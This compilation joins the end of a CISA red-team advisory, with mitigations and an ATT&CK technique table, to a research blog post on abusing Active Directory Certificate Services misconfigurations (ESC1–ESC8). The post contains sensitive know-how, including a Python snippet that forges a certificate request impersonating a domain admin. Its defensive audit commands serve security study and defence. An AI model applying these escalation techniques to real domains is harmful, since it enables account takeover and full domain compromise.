    • Implement Credential Guard for Windows 10 and Server 2016 (refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012 R2, enable Protected Process Light for Local Security Authority (LSA).
    • Refrain from storing plaintext credentials in scripts [CPG 3.4]. The red team discovered a PowerShell script containing plaintext credentials that allowed them to escalate to admin.
  • Upgrade to Windows Server 2019 or greater and Windows 10 or greater. These versions have security features not included in older operating systems.

As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that:

  • Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, policy enforcement).
  • Upgrades applications and infrastructure to leverage modern identity management and network access practices.
  • Centralizes and streamlines access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks.
  • Invests in technology and personnel to achieve these goals.

CISA encourages organizational IT leadership to ask their executive leadership the question: Can the organization accept the business risk of NOT implementing critical security controls such as MFA? Risks of that nature should typically be acknowledged and prioritized at the most senior levels of an organization.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 3).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

See CISA’s RedEye tool on CISA’s GitHub page. RedEye is an interactive open-source analytic tool used to visualize and report red team command and control activities. See CISA’s RedEye tool overview video for more information.

REFERENCES
[1] Bleeping Computer: New DFSCoerce NTLM Relay attack allows Windows domain takeover

APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 3 for all referenced red team tactics and techniques in this advisory. Note: activity was from Phase I unless noted.

Reconnaissance
Technique Title | ID | Use
Gather Victim Identity Information: Email Addresses | T1589.002 | The team found employee email addresses via open-source research.
Gather Victim Identity Information: Employee Names | T1589.003 | The team identified employee names via open-source research that could be used to derive email addresses.
Gather Victim Network Information: Network Security Appliances | T1590.006 | The team identified the organization's MDM vendor and leveraged that information to move laterally to SBS-connected assets.
Gather Victim Org Information | T1591 | The team conducted open-source research and identified an organizational branch that likely had access to an SBS asset.
Gather Victim Org Information: Determine Physical Locations | T1591.001 | The team conducted open-source research to identify the physical locations of upkeep/management staff of selected assets.
Search Open Technical Databases: Scan Databases | T1596.005 | The team queried an MDM SQL database to identify target administrators who recently connected with the MDM.
Resource Development
Technique Title | ID | Use
Acquire Infrastructure | T1583 | The team used third-party owned and operated infrastructure throughout their assessment for C2.
Establish Accounts: Email Accounts | T1585.002 | The team used commercially available email platforms for their spearphishing activity.
Obtain Capabilities: Tool | T1588.002 | The team used the following tools: Cobalt Strike and Merlin payloads for C2; KeeThief to obtain a decryption key from a KeePass database; and Rubeus and DFSCoerce in an NTLM relay attack.
Initial Access
Technique Title | ID | Use
Phishing: Spearphishing Link | T1566.002 | The team sent spearphishing emails with links to a red-team-controlled domain to gain access to the organization's systems.
Execution
Technique Title | ID | Use
Native API | T1106 | The team created a policy via the MDM API, which downloaded and executed a payload on a workstation.
User Execution | T1204 | Users downloaded and executed the team's initial access payloads after clicking buttons to trigger download and execution.
Persistence
Technique Title | ID | Use
Account Manipulation | T1098 | The team elevated account privileges to administrator and modified the user's account by adding Create Policy and Delete Policy permissions. During Phase II, the team created local admin accounts and an AD account; they added the created AD account to a domain admins group.
Create Account: Local Account | T1136.001 | During Phase II, the team created a local administrator account on a workstation and a server.
Create Account: Domain Account | T1136.002 | During Phase II, the team created an AD account.
Create or Modify System Process: Windows Service | T1543.003 | During Phase II, the team leveraged compromised workstation and domain admin accounts to execute a payload via Windows Service Creation on target workstations and the DC.
Event Triggered Execution: Windows Management Instrumentation Event Subscription | T1546.003 | The team used WMI Event Subscriptions to move laterally between sites.
Hijack Execution Flow: DLL Search Order Hijacking | T1574.001 | The team used DLL hijacking to move laterally between sites.
Privilege Escalation
Technique Title | ID | Use
Abuse Elevation Control Mechanism | T1548 | The team elevated user account privileges to administrator by modifying the user's account via adding Create Policy and Delete Policy permissions.
Defense Evasion
Technique Title | ID | Use
Valid Accounts: Domain Accounts | T1078.002 | During Phase II, the team compromised a domain admin account and used it to move laterally to multiple workstations and the DC.
Credential Access
Technique Title | ID | Use
OS Credential Dumping: LSASS Memory | T1003.001 | The team obtained cached credentials from a SharePoint server account by taking a snapshot of lsass.exe with a tool called nanodump, then exporting and processing the output offline with Mimikatz.
OS Credential Dumping: DCSync | T1003.006 | The team harvested AES-256 hashes via DCSync.
Brute Force: Password Cracking | T1110.002 | The team cracked a user's workstation account password after learning the user's patterns from plaintext credentials.
Unsecured Credentials | T1552 | The team found backups of a MySQL database that contained the encryption key needed to decrypt SSH passwords.
Unsecured Credentials: Credentials in Files | T1552.001 | The team found plaintext credentials to an API user account stored in PowerShell scripts on an MDM server.
Unsecured Credentials: Bash History | T1552.003 | The team found bash history files on Workstation 5 that appeared to contain SSH passwords saved in bash history.
Credentials from Password Stores: Password Managers | T1555.005 | The team pulled credentials from a KeePass database.
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | T1557.001 | The team ran the DFSCoerce python script, which prompted DC authentication to a server using the server's NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Steal or Forge Kerberos Tickets: Golden Ticket | T1558.001 | The team used the acquired krbtgt account hash throughout their assessment to forge legitimate TGTs.
Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003 | The team leveraged Rubeus and DFSCoerce in an NTLM relay attack to obtain the DC's TGT from a host with Unconstrained Delegation enabled.
Discovery
Technique Title | ID | Use
System Network Configuration Discovery | T1016 | The team queried the AD for information about the network's sites and subnets.
Remote System Discovery | T1018 | The team queried the AD, during Phase I and II, for information about computers on the network.
System Network Connections Discovery | T1049 | The team listed existing network connections on SCCM Server 1 to reveal an active SMB connection with Server 2.
Permission Groups Discovery: Domain Groups | T1069.002 | The team leveraged ldapsearch and dsquery to query and scrape Active Directory information.
Account Discovery: Domain Account | T1087.002 | The team queried AD for AD users (during Phase I and II), including for members of a SharePoint admin group and several standard user accounts with administrative access.
Cloud Infrastructure Discovery | T1580 | The team found SecOps network diagrams on a host detailing cloud infrastructure boundaries.
Domain Trust Discovery | T1482 | During Phase II, the team enumerated trust relationships within the AD Forest.
Group Policy Discovery | T1615 | The team scraped AD information, including GPOs.
Network Service Discovery | T1046 | During Phase II, the team enumerated ports on target systems from a previously compromised workstation.
System Owner/User Discovery | T1033 | During Phase II, the team enumerated the AD for current session information from every domain computer (Workstation and Server).
Lateral Movement
Technique Title | ID | Use
Remote Services: SMB/Windows Admin Shares | T1021.002 | The team moved laterally with an SMB beacon. During Phase II, they used compromised workstation and domain admin accounts to upload a payload via SMB on several target Workstations and the DC.
Use Alternate Authentication Material: Pass the Hash | T1550.002 | The team ran the DFSCoerce python script, which prompted DC authentication to a server using the server's NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Pass the Ticket | T1550.003 | The team used the asktgt command to impersonate accounts for which they had credentials by requesting account TGTs.
Command and Control
Technique Title | ID | Use
Application Layer Protocol | T1071 | The team remotely enumerated the local administrators group on target hosts to find valid user accounts. This technique relies on anonymous SMB pipe binds, which are disabled by default starting with Server 2016. During Phase II, the team established sessions that originated from a target Workstation and from the DC directly to an external host over a clear text protocol.
Application Layer Protocol: Web Protocols | T1071.001 | The team's C2 redirectors used HTTPS reverse proxies to redirect C2 traffic.
Application Layer Protocol: File Transfer Protocols | T1071.002 | The team used HTTPS reverse proxies to redirect C2 traffic between the target network and the team's Cobalt Strike servers.
Encrypted Channel | T1573 | The team's C2 traffic was encrypted in transit using encryption keys stored on their C2 servers.
Ingress Tool Transfer | T1105 | During Phase II, the team uploaded and executed well-known malicious files to the DC to generate host-based alerts.
Proxy: External Proxy | T1090.002 | The team used redirectors to redirect C2 traffic between the target organization's network and the team's C2 servers.
Proxy: Domain Fronting | T1090.004 | The team used domain fronting to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating.
Impact
Technique Title | ID | Use
Account Access Removal | T1531 | During Phase II, the team locked out several administrative AD accounts.


Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a

Certified Pre-Owned

Will Schroeder

Jun 17, 2021

TL;DR Active Directory Certificate Services has a lot of attack potential! Check out our whitepaper “Certified Pre-Owned: Abusing Active Directory Certificate Services” for complete details. We’re also presenting this material at Black Hat USA 2021.

[EDIT 06/22/21] — We’ve updated some of the details for ESC1 and ESC2 in this post which will be shortly updated in the whitepaper.

For the past several months, we (Will Schroeder and Lee Christensen) have been diving into the security of Active Directory Certificate Services (AD CS). While several aspects of Active Directory have received thorough attention from a security perspective, Active Directory Certificate Services has been relatively overlooked. AD CS is Microsoft’s PKI implementation that provides everything from encrypting file systems, to digital signatures, to user authentication (a large focus of our research), and more. While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous.

Today we're releasing the results of our research so far (there is still much to look at, and we know we have missed things) in the form of an extensive whitepaper and a defensive PowerShell toolkit for auditing these issues. The toolkit is heavily defense-focused, but we will also release two offensive tools in ~45 days at Black Hat, as we believe that the issues described in the paper are severe and widespread enough to warrant a delay in the offensive tool release. The whitepaper also contains substantial preventative and detective guidance.

AD CS and its security implications are complicated, and we highly recommend reading the whitepaper for complete context. This post is a brief summary of the paper, and we will release a number of additional posts in the coming weeks and months to highlight elements of the research.

So why care about this? Certificate abuse can grant an attacker everything from long-term account persistence to full domain escalation, as covered in the sections below.

Of note, nearly every environment with AD CS that we’ve examined for domain escalation misconfigurations has been vulnerable. It’s hard for us to overstate what a big deal these issues are.

Sidenote: because of the number of attacks we ended up documenting in this research, we have tagged each attack with an ID (e.g., ESC2) as well as each defense (e.g., DETECT3). This is for ease of mapping attacks to their appropriate defenses in the whitepaper.

Active Directory Certificate Services Crash Course

Common Terms and Acronyms

There are a lot of terms and acronyms we’re going to be using throughout this post (and paper), so here’s a quick breakdown of a few for reference:

  • PKI (Public Key Infrastructure) — a system to manage certificates/public key encryption
  • AD CS (Active Directory Certificate Services) — Microsoft’s PKI implementation
  • CA (Certificate Authority) — PKI server that issues certificates
  • Enterprise CA — CA integrated with AD (as opposed to a standalone CA), offers certificate templates
  • Certificate Template — a collection of settings and policies that defines the contents of a certificate issued by an enterprise CA
  • CSR (Certificate Signing Request) — a message sent to a CA to request a signed certificate
  • EKU (Extended/Enhanced Key Usage) — one or more object identifiers (OIDs) that define how a certificate can be used

Overview

AD CS is a server role that functions as Microsoft's public key infrastructure (PKI) implementation. As expected, it integrates tightly with Active Directory and enables the issuing of certificates, which are X.509-formatted digitally signed electronic documents that can be used for encryption, message signing, and/or authentication (our research focus).

The information included in a certificate binds an identity (the subject) to a public/private key pair. An application can then use the key pair in operations as proof of the identity of the user. Certificate Authorities (CAs) are responsible for issuing certificates.

At a high level, clients generate a public-private key pair, and the public key is placed in a certificate signing request (CSR) message along with other details such as the subject of the certificate and the certificate template name. Clients then send the CSR to the Enterprise CA server. The CA server then checks if the client is allowed to request certificates. If so, it determines if it will issue a certificate by looking up the certificate template AD object (more on these shortly) specified in the CSR. The CA will check if the certificate template AD object’s permissions allow the authenticating account to obtain a certificate. If so, the CA generates a certificate using the “blueprint” settings defined by the certificate template (e.g., EKUs, cryptography settings, issuance requirements, etc.) and using the other information supplied in the CSR if allowed by the certificate’s template settings. The CA signs the certificate using its private key and then returns it to the client.

That’s a lot of text. So here’s a graphic:

Certificate Templates

AD CS Enterprise CAs issue certificates with settings defined by AD objects known as certificate templates. These templates are collections of enrollment policies and predefined certificate settings and contain things like “How long is this certificate valid for?”, “What is the certificate used for?”, “How is the subject specified?”, “Who is allowed to request a certificate?”, and a myriad of other settings:

The pKIExtendedKeyUsage attribute on an AD certificate template object contains an array of object identifiers (OIDs) enabled for the template. These EKU object identifiers affect what the certificate can be used for (PKI Solutions has a breakdown of the EKU OIDs available from Microsoft). Our research focused on EKUs that, when present in a certificate, permit authentication to Active Directory. We originally thought that only the "Client Authentication" OID (1.3.6.1.5.5.7.3.2) enabled this; however, our research also found that the following OID scenarios can enable certificate-based authentication: Client Authentication (1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (1.3.6.1.5.2.3.4)*, Smart Card Logon (1.3.6.1.4.1.311.20.2.2), Any Purpose (2.5.29.37.0), and no EKU at all (i.e., a subordinate CA certificate).

*The 1.3.6.1.5.2.3.4 OID is not present in AD CS deployments by default and needs to be added manually, but it does work for client authentication.

Templates also have a number of other interesting settings which we explore in depth in the whitepaper. The paper also covers template “Issuance Requirements” which can function as preventative controls, which we will briefly touch on in this post.

Subject Alternative Names

A Subject Alternative Name (SAN) is an extension that allows additional identities to be bound to a certificate beyond just the subject of the certificate. For example, if a web server hosts content for multiple domains, each applicable domain could be included in the SAN so that the web server only needs a single HTTPS certificate instead of one for each domain.

This is all well and good for HTTPS certificates, but when combined with certificates that allow domain authentication, a dangerous scenario can arise. By default during certificate-based authentication, certificates are mapped to Active Directory accounts based on a user principal name (UPN) specified in the SAN. So, if an attacker can specify an arbitrary SAN when requesting a certificate that enables domain authentication, and the CA creates and signs a certificate using the attacker-supplied SAN, the attacker can become any user in the domain! Domain escalation scenarios can result from various AD CS template misconfigurations that allow unprivileged users to supply an arbitrary SAN in a certificate enrollment. We’ll cover these situations in the Domain Escalation section.
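To make the SAN mechanics concrete, the sketch below (using the third-party cryptography package, with placeholder names) builds a CSR whose SAN carries an arbitrary UPN via the Microsoft UPN otherName OID; this is the kind of request that a template allowing requester-supplied subjects would accept.

    # Sketch: build a CSR that requests an arbitrary UPN in the SAN (placeholder names).
    from cryptography import x509
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import rsa
    from cryptography.x509.oid import NameOID

    UPN_OID = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")   # Microsoft userPrincipalName otherName
    target_upn = "domainadmin@corp.example"                     # identity the requester wants to become

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    # otherName values are raw DER; 0x0C is the ASN.1 UTF8String tag (fine for short UPNs)
    upn_der = b"\x0c" + bytes([len(target_upn)]) + target_upn.encode()

    csr = (
        x509.CertificateSigningRequestBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "lowpriv.user")]))
        .add_extension(x509.SubjectAlternativeName([x509.OtherName(UPN_OID, upn_der)]), critical=False)
        .sign(key, hashes.SHA256())
    )
    print(csr.subject, csr.extensions)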

Active Directory Authentication with Certificates

Last year, @_ethicalchaos_ made a PR to Rubeus to implement PKINIT abuse, and covers the details in depth in their post on attacking smart card based Active Directory networks. This was a missing link for us offensively, and it means that we can now use Rubeus to request a Kerberos ticket granting ticket (TGT) using a certificate enabled for domain authentication:

That's right, we don't need a physical smart card or the Windows Credential Store to perform this certificate-based Kerberos authentication! Benjamin Delpy's (@gentilkiwi) Kekeo has supported this for years, but the Rubeus implementation made it more readily usable for our operations.

During our research, we also found that some protocols use Schannel — the security package backing SSL/TLS — to authenticate domain users. LDAPS is a commonly enabled use case. For example, the following screenshot shows the PowerShell script Get-LdapCurrentUser authenticating to LDAPS using a certificate for authentication and performing an LDAP whoami to see what account authenticated:
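A rough Python equivalent of that check, assuming the third-party ldap3 package, a PEM-exported certificate and key, and placeholder host names, is sketched below; it binds to LDAPS with the client certificate via SASL EXTERNAL and asks the server who it thinks we are.

    # Sketch: authenticate to LDAPS with a client certificate and run an LDAP "whoami".
    # Host, certificate, and key paths are placeholders.
    import ssl
    from ldap3 import Server, Connection, Tls, SASL, EXTERNAL

    tls = Tls(local_private_key_file="user.key", local_certificate_file="user.pem",
              validate=ssl.CERT_NONE)                     # lab setting; validate properly in practice
    server = Server("dc01.corp.example", port=636, use_ssl=True, tls=tls)

    conn = Connection(server, authentication=SASL, sasl_mechanism=EXTERNAL, auto_bind=True)
    print(conn.extend.standard.who_am_i())                # e.g., u:CORP\someuser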

Account Persistence

If an Enterprise CA exists, a user (or machine) can request a cert for any template available to them for enrollment. The whitepaper covers theft of existing certificates, but we’re only going to touch on “active” malicious enrollments here. Our goal, in the context of user credential theft, is to request a certificate for a template that allows us to authenticate to Active Directory as that user (or machine). For complete details, see the “Account Persistence” section in the whitepaper.

The Certify.exe find /clientauth command will query LDAP for available templates that we can examine for our desired criteria:

This can also be done via PSPKIAudit with Get-AuditCertificateTemplate | ?{$_.HasAuthenticationEku}
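For readers without those tools handy, a rough LDAP query for the same information is sketched below; it assumes the third-party ldap3 package, and the domain, bind credentials, and DN components are placeholders.

    # Sketch: list certificate templates whose EKUs allow domain authentication.
    from ldap3 import Server, Connection, NTLM, SUBTREE

    AUTH_EKUS = {
        "1.3.6.1.5.5.7.3.2",        # Client Authentication
        "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
        "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
        "2.5.29.37.0",              # Any Purpose
    }

    conn = Connection(Server("dc01.corp.example"), user="CORP\\lowpriv",
                      password="<password>", authentication=NTLM, auto_bind=True)
    conn.search("CN=Certificate Templates,CN=Public Key Services,CN=Services,"
                "CN=Configuration,DC=corp,DC=example",
                "(objectClass=pKICertificateTemplate)", search_scope=SUBTREE,
                attributes=["cn", "pKIExtendedKeyUsage"])

    for entry in conn.entries:
        attrs = entry.entry_attributes_as_dict
        ekus = set(attrs.get("pKIExtendedKeyUsage") or [])
        if not ekus or ekus & AUTH_EKUS:      # no EKU at all (SubCA-style) also enables authentication
            print(attrs.get("cn"), sorted(ekus))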

If we have GUI access to a host, we can manually request a certificate through certmgr.msc. Alternatively, Certify (or certreq.exe) can be used for these malicious enrollments:

These issued certificates can then be used with Rubeus to authenticate to Active Directory as this user, for as long as the certificate is valid. This is an alternative method of long-term credential theft that doesn’t touch LSASS and can be performed from a non-elevated context!

This also works for machine certificates, which can be combined with S4U2Self to obtain a Kerberos service ticket to any service on the host (e.g., CIFS, HTTP, RPCSS, etc.) as any user. Elad Shamir’s excellent post about Kerberos delegation attacks details this attack scenario.

And since certificates are independent authentication material, these certificates will still be usable even if the user (or computer) resets their password!

Domain Escalation

While there isn't anything inherently insecure about AD CS (except for ESC8, as detailed below), it is surprisingly easy to misconfigure its various elements, resulting in ways for unelevated users to escalate in the domain. We'll briefly cover the main sets of misconfigurations, but again, see the whitepaper for complete details.

Misconfigured Certificate Templates — ESC1

In order to abuse this misconfiguration, the following conditions must be met (a minimal check for conditions 5 and 6 is sketched after the list):

  1. The Enterprise CA grants low-privileged users enrollment rights. The Enterprise CA's configuration must permit low-privileged users the ability to request certificates. See the "Background — Certificate Enrollment" section in the whitepaper for more details.
  2. Manager approval is disabled. This setting necessitates that a user with certificate manager permissions review and approve the requested certificate before the certificate is issued. See the "Background — Certificate Enrollment — Issuance Requirements" section in the whitepaper for more details.
  3. No authorized signatures are required. This setting requires any CSR to be signed by an existing authorized certificate. See the “Background — Certificate Enrollment — Issuance Requirements” section in the whitepaper for more details.
  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Having certificate enrollment rights allows a low-privileged attacker to request and obtain a certificate based on the template. Enrollment rights are granted via the certificate template AD object’s security descriptor.
  5. The certificate template defines EKUs that enable authentication. Applicable EKUs include Client Authentication (OID 1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (1.3.6.1.5.2.3.4), Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2), Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA).
  6. The certificate template allows requesters to specify a subjectAltName (SAN) in the CSR. If a requester can specify the SAN in a CSR, the requester can request a certificate as anyone (e.g., a domain admin user). The certificate template’s AD object specifies if the requester can specify the SAN in its mspki-certificate-name-flag property. The mspki-certificate-name-flag property is a bitmask and if the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is present, a requester can specify the SAN. This is surfaced as the “Supply in request” option in the “Subject Name” tab in certtmpl.msc.
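As a rough illustration of conditions 5 and 6 only, the helper below tests a template's EKU list and mspki-certificate-name-flag bitmask for the ESC1 combination. The values are placeholders, and a real audit should also verify enrollment rights and the CA's configuration, as PSPKIAudit and Certify do.

    # Sketch: flag templates that combine an authentication EKU with
    # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (ESC1 conditions 5 and 6 only).
    CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
    AUTH_EKUS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.2.3.4", "1.3.6.1.4.1.311.20.2.2", "2.5.29.37.0"}

    def looks_like_esc1(ekus, name_flag):
        """ekus: list of EKU OID strings; name_flag: msPKI-Certificate-Name-Flag value."""
        enables_auth = not ekus or bool(set(ekus) & AUTH_EKUS)   # no EKU (SubCA) also authenticates
        supplies_subject = bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
        return enables_auth and supplies_subject

    # Example: a template with Client Authentication and "Supply in request" enabled
    print(looks_like_esc1(["1.3.6.1.5.5.7.3.2"], 0x1))   # True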

Misconfigured Certificate Templates — ESC2

In order to abuse this misconfiguration, the following conditions must be met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.
  2. Manager approval is disabled. Details are the same as in ESC1.
  3. No authorized signatures are required. Details are the same as in ESC1.
  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.
  5. The certificate template defines Any Purpose EKUs or no EKU.

[EDIT 06/22/21]

While templates with these EKUs can’t be used to request authentication certificates as other users without the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag being present (i.e., ESC1), an attacker can use them to authenticate to AD as the user who requested them and these two EKUs are certainly dangerous on their own.

We were initially a bit unclear about the capabilities of the Any Purpose and subordinate CA (SubCA) EKUs, but others reached out and helped us clarify our understanding. An attacker can use a certificate with the Any Purpose EKU for (surprise!) any purpose — client authentication, server authentication, code signing, etc. In contrast, an attacker can use a certificate with no EKUs — a subordinate CA certificate — for any purpose as well but could also use it to sign new certificates. As such, using a subordinate CA certificate, an attacker could specify arbitrary EKUs or fields in the new certificates.

HOWEVER, if the subordinate CA is not trusted by the NTAuthCertificates object (which it won’t be by default), the attacker cannot create new certificates that will work for domain authentication. Still, the attacker can create new certificates with any EKU and arbitrary certificate values, of which there’s plenty the attacker could potentially abuse (e.g., code signing, server authentication, etc.) and might have large implications for other applications in the network like SAML, AD FS, or IPSec.

We feel confident in stating that it’s very bad if an attacker can obtain an Any Purpose or subordinate CA (SubCA) certificate, regardless of whether it’s trusted by NTAuthCertificates or not.

[/EDIT]

Enrollment Agent Templates — ESC3

In order to abuse this misconfiguration, the following conditions must be met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.
  2. Manager approval is disabled. Details are the same as in ESC1.
  3. No authorized signatures are required. Details are the same as in ESC1.
  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.
  5. The certificate template defines the Certificate Request Agent EKU. The Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) allows for requesting other certificate templates on behalf of other principals.
  6. Enrollment agent restrictions are not implemented on the CA.

The Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1), known as "Enrollment Agent" in Microsoft documentation, allows a principal to enroll for a certificate on behalf of another user. For anyone who enrolls in such a template, the resulting certificate can be used to co-sign requests on behalf of any user, for any Schema Version 1 template or any Schema Version 2+ template that requires the appropriate "Authorized Signatures/Application Policy" Issuance Requirement. This also assumes that there are no limiting Enrollment Agent Restrictions on the CA.

The preceding few sentences might need a bit of clarification. If an attacker is able to enroll in a template with a "Certificate Request Agent" EKU, they can enroll on behalf of any user for any Version 1 certificate template, or any Version 2+ template configured to explicitly require this co-signing scenario. Schema Version 1 templates don't implement this type of Issuance Requirement, so all are on the table. Specifically, the User and Machine/Computer templates are prime targets as they contain the Client Authentication EKU and are published by default (though this can be changed), and there are other Version 1 templates that can be vulnerable if published.

If a Version 1 template is duplicated for modification, it automatically becomes Schema Version 2 by default, meaning a “Certificate Request Agent” template will NOT work unless such an issuance requirement is explicitly specified.

A bit confusing? We know. We do our best to break this down in more depth in the whitepaper, but it’s a complex set of interwoven restrictions.

Vulnerable Certificate Template Access Control — ESC4

Certificate templates are securable objects in Active Directory, meaning they have a security descriptor that specifies which Active Directory principals have specific permissions over the template. For more background on Active Directory ACLs, see our (other) whitepaper on the subject.

We say that a template is misconfigured at the access control level if it has Access Control Entries (ACEs) that allow unintended, or otherwise unprivileged, Active Directory principals to edit sensitive security settings in the template. That is, if an attacker is able to chain access to a point that they can actively push a misconfiguration to a template that is not otherwise vulnerable (e.g., by enabling the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit in the mspki-certificate-name-flag property for a template that allows for domain authentication), we end up with domain compromise scenarios similar to what we've already covered. An example of this we have seen in multiple environments is Domain Computers having FullControl or WriteDacl permissions over a certificate template's AD object, allowing attackers with access to any AD computer to modify the certificate template to a dangerous state. This is a scenario explored in Christoph Falta's GitHub repo.

Vulnerable PKI Object Access Control — ESC5

We won’t touch on this one as heavily here, but a number of objects outside of certificate templates and the certificate authority itself can have a security impact on the entire AD CS system.

These possibilities include (but are not limited to):

  • CA server’s AD computer object (i.e., compromise through RBCD)
  • The CA server’s RPC/DCOM server
  • Any descendant AD object or container under CN=Public Key Services,CN=Services,CN=Configuration,DC=<COMPANY>,DC=<COM> (e.g., the Certificate Templates container, the Certification Authorities container, the NTAuthCertificates object, the Enrollment Services container, etc.)
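
One way to eyeball these objects is with the ActiveDirectory PowerShell module's AD: drive, which exposes the Configuration naming context. A rough sketch, assuming the module is available and with placeholder domain components:

# List objects under the Public Key Services container in the Configuration NC
Get-ChildItem "AD:\CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" -Recurse

# Spot-check the DACL on any interesting object (e.g., NTAuthCertificates) for unexpected
# FullControl/WriteDacl/WriteOwner ACEs held by low-privileged principals
Get-Acl "AD:\CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" | Select-Object -ExpandProperty Access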

EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

Another way to supply arbitrary SANs, described in a CQure Academy post, involves the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. As Microsoft describes, “If this flag is set on the CA, any request (including when the subject is built from Active Directory®) can have user defined values in the subject alternative name.” This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine). As this Keyfactor post describes, this setting “just makes it work”, which is why it’s likely flipped in many environments by sysadmins who don’t fully understand the security implications.
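
The flag lives in the CA's registry configuration, so it can be checked, and by CA administrators cleared, with certutil. A sketch, with a placeholder CA config string:

# Check whether EDITF_ATTRIBUTESUBJECTALTNAME2 is present in the CA's EditFlags
certutil -config "CA01.corp.local\CORP-CA" -getreg policy\EditFlags

# Remediation (run as a CA admin, on or against the CA): clear the flag, then restart the CA service
certutil -config "CA01.corp.local\CORP-CA" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
net stop certsvc
net start certsvc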

Vulnerable Certificate Authority Access Control — ESC7

Outside of certificate templates, a certificate authority itself has permissions (accessible through certsrv.msc) that secure various CA actions. From a security perspective we care about the ManageCA (aka “CA Administrator”) and ManageCertificates (aka “Certificate Manager/Officer”) permissions.

The ManageCA permission grants a principal the ability to perform “Administrative” CA actions, including the modification of persistent configuration data. This includes the EDITF_ATTRIBUTESUBJECTALTNAME2 flag, allowing any principal with the ManageCA permission to flip that flag on and create the ESC6 scenario. This can be done with PSPKI’s Enable-PolicyModuleFlag cmdlet.

The ManageCertificates permission allows the principal to approve pending certificate requests, negating the “Manager Approval” Issuance Requirement/protection. So while it can’t be used on its own to compromise the domain, it can function as a protection bypass.
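
To see which principals hold these rights, the CA's security descriptor can be reviewed in certsrv.msc or enumerated with PSPKI. A rough sketch, assuming PSPKI's Get-CertificationAuthorityAcl cmdlet and a placeholder CA hostname:

# Enumerate who holds ManageCA / ManageCertificates (and other rights) on the CA
Get-CertificationAuthority -ComputerName ca01.corp.local | Get-CertificationAuthorityAcl | Select-Object -ExpandProperty Access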

NTLM Relay to AD CS HTTP Endpoints — ESC8

We cover this in more detail in the “Background — Certificate Enrollment” section of the whitepaper, but AD CS supports several HTTP-based enrollment methods via additional server roles that administrators can optionally install: the Certificate Authority Web Enrollment interface, the Certificate Enrollment Web Service (CES), and the Network Device Enrollment Service (NDES).

These HTTP-based certificate enrollment interfaces are all vulnerable to NTLM relay attacks. Using NTLM relay, an attacker can impersonate an inbound-NTLM-authenticating victim user. While impersonating the victim user, an attacker could access these web interfaces and request a client authentication certificate based on the User or Machine certificate templates.

This attack, like all NTLM relay attacks, requires a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, but a simple technique is to coerce a machine account to authenticate to the attacker’s host using the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) methods using a tool like SpoolSample or Dementor. The attacker can then use NTLM relay to impersonate the machine account and request a client authentication certificate (e.g., the default Machine/Computer template) as the victim machine account. If the victim machine account can perform privileged actions such as domain replication (e.g., domain controllers or Exchange servers), the attacker could use this certificate to compromise the domain. Otherwise, the attacker could logon as the victim machine account and use S4U2Self as previously described to access the victim machine’s host OS.

  • Note: Newer OSes have patched the MS-RPRN coerced authentication “feature”. However, almost every environment we examine still has Server 2016 machines running, which are still vulnerable to this. There are other ways to coerce accounts to authenticate to an attacker as well.
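
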